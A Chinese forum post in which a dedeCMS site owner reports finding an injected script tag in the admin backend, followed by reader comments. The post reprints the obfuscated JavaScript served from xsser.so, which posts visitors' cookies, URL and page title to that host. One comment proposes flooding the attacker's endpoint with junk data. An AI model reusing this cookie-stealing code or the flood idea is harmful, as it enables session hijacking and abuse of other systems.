dede又中标了!?!?
今天打开dedecms后台,登录后跳转很慢,看到正在加载这个页面,http://xsser.so/
看了一下代码,居然在框架的head里加了这个:
<script src="http://t.cn/R2LgMPP" language="javascript" type="text/javascript"></script>
打开http://t.cn/R2LgMPP,实际地址是:http://xsser.so/index.php?u=4a89dc
显示内容是js代码:
var bid=421; var xingUrl='http://xsser.so/index.php'; eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}]; e=function(){return'[235-9b-df-np-u]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('x=c.x||{d:3(){5(c.j){8 2=f j()}k 5(c.g){l{8 2=f g("Msxml2.m")}n(e){l{8 2=f g("Microsoft.m")}n(e){}}}h 2},i:3(2,6){2.onreadystatechange=3(){5(2.readyState==4){5(2.status==200){5(6)allback(2.responseText)}}}},p:3(o){5(typeof(o)=='object'){8 7=''; for(a in o){7+=a+'='+o[a]+'&'}7=7.substr(0,7.length-1);h 7}k{h o}},q:3(9,6){2=x.d();2.r('q',9,s);2.t(null);x.i(2,6)},u:3(9,b,6){2=x.d();2.r('u',9,s); 2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');b=x.p(b);2.t(b);x.i(2,6)}}',[],31,'||ajax|function||if|callback|str|var|url||content|window|request||new|ActiveXObject|return|handle|XMLHttpRequest|else|try|XMLHTTP|catch||display|get|open|true|send|post'.split('|'),0,{})) x.post(xingUrl+"?a=info",{bid:bid,title:document.title,url:escape(document.URL),cookie:document.cookie});
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(9)
敢不敢开源?
从来不用cms,都是
自己的mvc从0开始。是不是会被喷?
我司还在用dedeCMS,我也是醉了。
dede已经多年无人维护了吧。老漏洞没人修复,别用了。
问题是这个网址是什么加入到html页面里去的?
一般情况是 通过sql注入漏洞写入 一句话木马。或者是有上传漏洞。
是不是不用登录就可以访问我的后台?如何防范
dede 本来就是做垃圾站的,就是用来被黑的,你还在乎这个干吗?
有一个很讽刺的事情,曾经的一个很大的PHP培训机构 php100,在2011年左右的时候因为用了dedeCMS,频繁被黑(比如:http://m.oschina.net/blog/28764),老脸都丢光了,最后无奈换了个CMS系统。
x.post(xingUrl+"?a=info",{bid:bid,title:document.title,url:escape(document.URL),cookie:document.cookie}); 写一个循环,向这个接口提交几千万数据。
问题是这个网址是什么加入到html页面里去的?